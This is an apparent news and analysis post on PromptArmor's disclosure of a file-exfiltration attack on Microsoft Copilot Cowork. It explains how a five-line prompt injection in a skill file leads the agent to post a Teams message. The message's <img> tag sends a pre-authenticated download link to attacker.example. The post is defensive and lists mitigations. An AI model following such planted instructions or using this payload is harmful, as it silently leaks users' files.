Microsoft Copilot Cowork can be tricked into exfiltrating M365 files — what builders need to know
PromptArmor disclosed on May 25, 2026 that an indirect prompt injection inside a 5-line Cowork skill can silently exfiltrate files from a user's Microsoft 365 tenant. The agent is GA-preview in Frontier and runs on Anthropic Claude. Here is the attack, why it works, and what teams building on Microsoft's agent stack should do today.
On May 25, 2026, security firm PromptArmor published a working file-exfiltration exploit against Microsoft Copilot Cowork — the new agentic surface inside Microsoft 365 that drafts emails, posts in Teams, edits Office documents, and reorganises cloud storage on a user’s behalf. Cowork is currently a Frontier preview feature and runs on Anthropic’s Claude models, with Anthropic acting as a Microsoft subprocessor.
The PromptArmor team got it to leak a real file with a five-line injection inside an 81-line Cowork skill file (SKILL.md).
How the attack works
Cowork’s auto-approval policy is the load-bearing weakness. Sending an email to the user themselves and posting a Teams message into a chat the user owns are both treated as low-risk write actions and do not currently prompt for a per-action approval. PromptArmor chains that with two more design facts:
- Cowork can resolve a SharePoint/OneDrive file into a pre-authenticated download link — anyone who opens the URL inherits the user’s access for that file.
- Microsoft Teams and Outlook render external
<img>tags inline; opening a poisoned message in the client fires the network request automatically.
So a malicious skill quietly asks Cowork to “post a status update” containing <img src="https://attacker.example/?file=<pre-auth-download-link>">. The user never sees the markup — the bytes leave the tenant the moment Teams hydrates the message. PromptArmor reports a high success rate against Claude Opus 4.7 and against Microsoft’s auto-routing model selector — i.e. the strongest models on the stack are not a defence here.
A second, separately disclosed vulnerability lets data egress straight out of Cowork’s sandbox without going through Teams at all. Microsoft has been notified; PromptArmor has not yet published full details on that one.
What this means if you’re building with Microsoft 365 agents
Three working takeaways:
1. Treat every untrusted document as a potential prompt source. Cowork dutifully reads any SharePoint file in scope, including ones that arrived via inbound email, shared OneDrive links, or third-party SaaS sync. As soon as user-readable content enters the agent’s context, “data” and “instructions” stop being distinguishable. The vulnerability is not in Claude or in Cowork’s code path — it is in the assumption that “the model will know to ignore that paragraph.”
2. The default auto-approval set is too permissive for production tenants. PromptArmor’s practitioner guide recommends explicitly disabling “Don’t ask again” on every Cowork write action — send email, post to Teams, schedule meetings, modify or delete files. That makes Cowork much less ergonomic, and that is the point: builders who keep auto-approval on are accepting silent-exfiltration as part of their threat model whether they realise it or not.
3. Custom skills need an admin gate. A skill file is just markdown, but in Cowork it executes with the user’s full Microsoft Graph identity. Treat SKILL.md files the way you would treat unsigned binaries: nothing user-installed ships to production tenants without an explicit admin review.
For teams building their own agent products, the deeper lesson is the one we keep coming back to in our note on coding-agent constraint decay: the failure mode is almost never a clever jailbreak — it is the agent doing exactly what an attacker politely asked, through a channel the agent was authorised to use. See also Microsoft’s parallel move to pull Claude Code from internal engineering seats, which leaves Copilot CLI as the in-house standard without a comparable agentic-action surface yet.
Caveat
PromptArmor’s proof-of-concept used a deliberately seeded skill file. Whether an attacker can plant a poisoned skill into a victim tenant via shared content alone is the second vulnerability PromptArmor disclosed privately to Microsoft and has not detailed. Until then, treat the scenario as plausible but not yet demonstrated end-to-end without insider access. The mitigations above hold either way.
Sources
Source: PromptArmor